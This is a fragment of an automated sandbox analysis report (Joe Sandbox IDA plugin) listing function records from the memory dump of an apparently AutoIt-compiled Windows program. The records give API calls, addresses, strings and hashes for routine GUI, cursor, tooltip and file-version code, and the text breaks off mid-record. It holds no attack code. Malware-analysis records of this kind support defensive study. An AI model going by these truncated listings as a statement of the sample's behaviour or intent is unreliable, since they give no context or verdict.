                                                  • Instruction Fuzzy Hash: 8202F130104321AFEB25CF25C889BABBBE5FF49314F04852DF9A9D62A1C774DA45CB52
                                                  APIs
                                                  • GetSysColor.USER32(00000012), ref: 00C4A903
                                                  • SetTextColor.GDI32(?,?), ref: 00C4A907
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C4A91D
                                                  • GetSysColor.USER32(0000000F), ref: 00C4A928
                                                  • CreateSolidBrush.GDI32(?), ref: 00C4A92D
                                                  • GetSysColor.USER32(00000011), ref: 00C4A945
                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C4A953
                                                  • SelectObject.GDI32(?,00000000), ref: 00C4A964
                                                  • SetBkColor.GDI32(?,00000000), ref: 00C4A96D
                                                  • SelectObject.GDI32(?,?), ref: 00C4A97A
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00C4A999
                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C4A9B0
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00C4A9C5
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C4A9ED
                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C4AA14
                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00C4AA32
                                                  • DrawFocusRect.USER32(?,?), ref: 00C4AA3D
                                                  • GetSysColor.USER32(00000011), ref: 00C4AA4B
                                                  • SetTextColor.GDI32(?,00000000), ref: 00C4AA53
                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C4AA67
                                                  • SelectObject.GDI32(?,00C4A5FA), ref: 00C4AA7E
                                                  • DeleteObject.GDI32(?), ref: 00C4AA89
                                                  • SelectObject.GDI32(?,?), ref: 00C4AA8F
                                                  • DeleteObject.GDI32(?), ref: 00C4AA94
                                                  • SetTextColor.GDI32(?,?), ref: 00C4AA9A
                                                  • SetBkColor.GDI32(?,?), ref: 00C4AAA4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 1996641542-0
                                                  • Opcode ID: 57b0ea774cae5658d71e8e8d7602ae98f9bce11f7cbb49beeecf20e0d4f98767
                                                  • Instruction ID: a58bb7da1203cafede9c56aabc89a390f2a04a92b0aae7345b109be3ea7daef8
                                                  • Opcode Fuzzy Hash: 57b0ea774cae5658d71e8e8d7602ae98f9bce11f7cbb49beeecf20e0d4f98767
                                                  • Instruction Fuzzy Hash: FE513A75900208EFDB119FA4DC48FAEBBB9FB49320F114629F911AB2A1D7719A41DF90
                                                  APIs
                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C48AC1
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C48AD2
                                                  • CharNextW.USER32(0000014E), ref: 00C48B01
                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C48B42
                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C48B58
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C48B69
                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C48B86
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00C48BD8
                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C48BEE
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C48C1F
                                                  • _memset.LIBCMT ref: 00C48C44
                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C48C8D
                                                  • _memset.LIBCMT ref: 00C48CEC
                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C48D16
                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C48D6E
                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00C48E1B
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C48E3D
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C48E87
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C48EB4
                                                  • DrawMenuBar.USER32(?), ref: 00C48EC3
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00C48EEB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                  • String ID: 0
                                                  • API String ID: 1073566785-4108050209
                                                  • Opcode ID: 81a66b096b50dd778734d17adeb55005f999d6aca5cb5c8322586c02f026e11f
                                                  • Instruction ID: d95ca8dc465735452b9ea3da7ade6e05f0176d80f5d5718acf638c306b3e5c8d
                                                  • Opcode Fuzzy Hash: 81a66b096b50dd778734d17adeb55005f999d6aca5cb5c8322586c02f026e11f
                                                  • Instruction Fuzzy Hash: 89E17274901218AFDF209F55CC84FEE7BB9FF06710F10815AF925AA190DBB09A89DF60
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00C449CA
                                                  • GetDesktopWindow.USER32 ref: 00C449DF
                                                  • GetWindowRect.USER32(00000000), ref: 00C449E6
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C44A48
                                                  • DestroyWindow.USER32(?), ref: 00C44A74
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C44A9D
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C44ABB
                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C44AE1
                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00C44AF6
                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C44B09
                                                  • IsWindowVisible.USER32(?), ref: 00C44B29
                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C44B44
                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C44B58
                                                  • GetWindowRect.USER32(?,?), ref: 00C44B70
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00C44B96
                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00C44BB0
                                                  • CopyRect.USER32(?,?), ref: 00C44BC7
                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00C44C32
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                  • String ID: ($0$tooltips_class32
                                                  • API String ID: 698492251-4156429822
                                                  • Opcode ID: 0a884ad46656503c490da1e1558e9779c4c5a89790c1f730b47beaf15e99c0db
                                                  • Instruction ID: 6a23fe7d520f8e73b3c96a980ac068a6dfd3f0acaa0f44b6be1d30b8c22d666c
                                                  • Opcode Fuzzy Hash: 0a884ad46656503c490da1e1558e9779c4c5a89790c1f730b47beaf15e99c0db
                                                  • Instruction Fuzzy Hash: BCB18A71604340AFDB08DF64C888B6ABBE4FF89310F10891CF9999B2A1DB71ED05CB95
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C244AC
                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C244D2
                                                  • _wcscpy.LIBCMT ref: 00C24500
                                                  • _wcscmp.LIBCMT ref: 00C2450B
                                                  • _wcscat.LIBCMT ref: 00C24521
                                                  • _wcsstr.LIBCMT ref: 00C2452C
                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C24548
                                                  • _wcscat.LIBCMT ref: 00C24591
                                                  • _wcscat.LIBCMT ref: 00C24598
                                                  • _wcsncpy.LIBCMT ref: 00C245C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                  • API String ID: 699586101-1459072770
                                                  • Opcode ID: 10897f0963a655141dff82c2ea2631157ed1977e74b35764f9bac5bbc7b00866
                                                  • Instruction ID: deb467d3d86072197dfb7ec1c267d8d6cd9eb7f1d1afcf58f2e72fdd8d06041e
                                                  • Opcode Fuzzy Hash: 10897f0963a655141dff82c2ea2631157ed1977e74b35764f9bac5bbc7b00866
                                                  • Instruction Fuzzy Hash: F6410631A402517BDB14BB769C07FBF77ECEF46710F0040BAFA05E6182EB74AA0196A5
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BC28BC
                                                  • GetSystemMetrics.USER32(00000007), ref: 00BC28C4
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BC28EF
                                                  • GetSystemMetrics.USER32(00000008), ref: 00BC28F7
                                                  • GetSystemMetrics.USER32(00000004), ref: 00BC291C
                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BC2939
                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BC2949
                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BC297C
                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BC2990
                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00BC29AE
                                                  • GetStockObject.GDI32(00000011), ref: 00BC29CA
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC29D5
                                                    • Part of subcall function 00BC2344: GetCursorPos.USER32(?), ref: 00BC2357
                                                    • Part of subcall function 00BC2344: ScreenToClient.USER32(00C857B0,?), ref: 00BC2374
                                                    • Part of subcall function 00BC2344: GetAsyncKeyState.USER32(00000001), ref: 00BC2399
                                                    • Part of subcall function 00BC2344: GetAsyncKeyState.USER32(00000002), ref: 00BC23A7
                                                  • SetTimer.USER32(00000000,00000000,00000028,00BC1256), ref: 00BC29FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                  • String ID: AutoIt v3 GUI
                                                  • API String ID: 1458621304-248962490
                                                  • Opcode ID: 029f1243d6d7c6a3114b246b879b2c80c719b4e43265bc5edad54f3063c28d21
                                                  • Instruction ID: 85b57e122864f3f9b9b64578f39cd756b18a5671f98029d05037099059db62fd
                                                  • Opcode Fuzzy Hash: 029f1243d6d7c6a3114b246b879b2c80c719b4e43265bc5edad54f3063c28d21
                                                  • Instruction Fuzzy Hash: CBB17B75A4020AEFDB14DFA8DD85FAE7BF4FB08311F104269FA15A72A0DB74A841CB54
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C1A47A
                                                  • __swprintf.LIBCMT ref: 00C1A51B
                                                  • _wcscmp.LIBCMT ref: 00C1A52E
                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C1A583
                                                  • _wcscmp.LIBCMT ref: 00C1A5BF
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00C1A5F6
                                                  • GetDlgCtrlID.USER32(?), ref: 00C1A648
                                                  • GetWindowRect.USER32(?,?), ref: 00C1A67E
                                                  • GetParent.USER32(?), ref: 00C1A69C
                                                  • ScreenToClient.USER32(00000000), ref: 00C1A6A3
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C1A71D
                                                  • _wcscmp.LIBCMT ref: 00C1A731
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00C1A757
                                                  • _wcscmp.LIBCMT ref: 00C1A76B
                                                    • Part of subcall function 00BE362C: _iswctype.LIBCMT ref: 00BE3634
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                  • String ID: %s%u
                                                  • API String ID: 3744389584-679674701
                                                  • Opcode ID: 6e98cba361fdbdfcc84673882c635fedf1c1145995b785408dc465ad80581769
                                                  • Instruction ID: 41e4d5dfe851e1415f95e050e27cf6bc6fa42987531a00d4530203811c35bf3c
                                                  • Opcode Fuzzy Hash: 6e98cba361fdbdfcc84673882c635fedf1c1145995b785408dc465ad80581769
                                                  • Instruction Fuzzy Hash: 7FA1C271205606AFD715DF60C884FEAB7E8FF45314F048529F9A9C2190DB30EA86DB92
                                                  APIs
                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00C1AF18
                                                  • _wcscmp.LIBCMT ref: 00C1AF29
                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C1AF51
                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00C1AF6E
                                                  • _wcscmp.LIBCMT ref: 00C1AF8C
                                                  • _wcsstr.LIBCMT ref: 00C1AF9D
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00C1AFD5
                                                  • _wcscmp.LIBCMT ref: 00C1AFE5
                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C1B00C
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00C1B055
                                                  • _wcscmp.LIBCMT ref: 00C1B065
                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00C1B08D
                                                  • GetWindowRect.USER32(00000004,?), ref: 00C1B0F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                  • String ID: @$ThumbnailClass
                                                  • API String ID: 1788623398-1539354611
                                                  • Opcode ID: c05ed8b5d8e4cbcfb6df01832ea3cd138aa480ec8b9ffa343bebfd9046def4c2
                                                  • Instruction ID: be30a1fa309d4d50e8ba4fb67d7c1db05b8d9fd90fe75e15489bdb44d0003006
                                                  • Opcode Fuzzy Hash: c05ed8b5d8e4cbcfb6df01832ea3cd138aa480ec8b9ffa343bebfd9046def4c2
                                                  • Instruction Fuzzy Hash: 0781C171108205AFDB00DF11C885FEA7BE8FF46714F1484AAFD958A092DB34DE8ADB61
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                  • API String ID: 1038674560-1810252412
                                                  • Opcode ID: 2e79c04a09a2597555abf21e5e6b7b43cb8e40eb04f9600f3582a0d1b39abbdc
                                                  • Instruction ID: bf93a0375d5e93ae269c0f7b9d84de5fe01229ee36e2b2c9b07585c576a18f8a
                                                  • Opcode Fuzzy Hash: 2e79c04a09a2597555abf21e5e6b7b43cb8e40eb04f9600f3582a0d1b39abbdc
                                                  • Instruction Fuzzy Hash: A731A331A48209ABEA10FB65DE13FEE77E4AF11720F2041B9F455710D1EF626F44EA92
                                                  APIs
                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00C35013
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00C3501E
                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00C35029
                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00C35034
                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00C3503F
                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00C3504A
                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00C35055
                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00C35060
                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00C3506B
                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00C35076
                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00C35081
                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00C3508C
                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00C35097
                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00C350A2
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00C350AD
                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00C350B8
                                                  • GetCursorInfo.USER32(?), ref: 00C350C8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Cursor$Load$Info
                                                  • String ID:
                                                  • API String ID: 2577412497-0
                                                  • Opcode ID: 204be6d255d48f27121eeed48200017b489ece451a3d87c741173ec03750da8d
                                                  • Instruction ID: 616533f7dcd1d8313f351d7f38baf1e669db4ff84900b635600b9be0088cf773
                                                  • Opcode Fuzzy Hash: 204be6d255d48f27121eeed48200017b489ece451a3d87c741173ec03750da8d
                                                  • Instruction Fuzzy Hash: CA3105B1D483196ADF109FB68C8995FBFE8FF04750F50452AA51DE7280DA7965008F91
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C4A259
                                                  • DestroyWindow.USER32(?,?), ref: 00C4A2D3
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C4A34D
                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C4A36F
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C4A382
                                                  • DestroyWindow.USER32(00000000), ref: 00C4A3A4
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BC0000,00000000), ref: 00C4A3DB
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C4A3F4
                                                  • GetDesktopWindow.USER32 ref: 00C4A40D
                                                  • GetWindowRect.USER32(00000000), ref: 00C4A414
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C4A42C
                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C4A444
                                                    • Part of subcall function 00BC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BC25EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                  • String ID: 0$tooltips_class32
                                                  • API String ID: 1297703922-3619404913
                                                  • Opcode ID: 0a312f1c2e396238c1a37a5235bd43473118d0193f381650855c50d002269f3e
                                                  • Instruction ID: 1d15b9ef73f5a3ff897618db085c41f41bee062fef214c0ce3ec230bc20818a7
                                                  • Opcode Fuzzy Hash: 0a312f1c2e396238c1a37a5235bd43473118d0193f381650855c50d002269f3e
                                                  • Instruction Fuzzy Hash: 0771BF74180205AFD725CF28CC49FAA7BF9FB89304F04452DF995872A1D7B0EA02CB56
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • DragQueryPoint.SHELL32(?,?), ref: 00C4C627
                                                    • Part of subcall function 00C4AB37: ClientToScreen.USER32(?,?), ref: 00C4AB60
                                                    • Part of subcall function 00C4AB37: GetWindowRect.USER32(?,?), ref: 00C4ABD6
                                                    • Part of subcall function 00C4AB37: PtInRect.USER32(?,?,00C4C014), ref: 00C4ABE6
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C4C690
                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C4C69B
                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C4C6BE
                                                  • _wcscat.LIBCMT ref: 00C4C6EE
                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C4C705
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C4C71E
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00C4C735
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00C4C757
                                                  • DragFinish.SHELL32(?), ref: 00C4C75E
                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C4C851
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                  • API String ID: 169749273-3440237614
                                                  • Opcode ID: f4ca4c03a37defccdbc2f86cb3159e2fe633e4a4f2f11787dae16763aa890b6c
                                                  • Instruction ID: fdce1233e6435cfcc94d81a4db830e0429709a22df80c7c028fe415757ee6885
                                                  • Opcode Fuzzy Hash: f4ca4c03a37defccdbc2f86cb3159e2fe633e4a4f2f11787dae16763aa890b6c
                                                  • Instruction Fuzzy Hash: FF615671108304AFC701EF64CC85EAFBBE8FF89750F00496EF595921A1DB70AA49CB66
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00C44424
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C4446F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
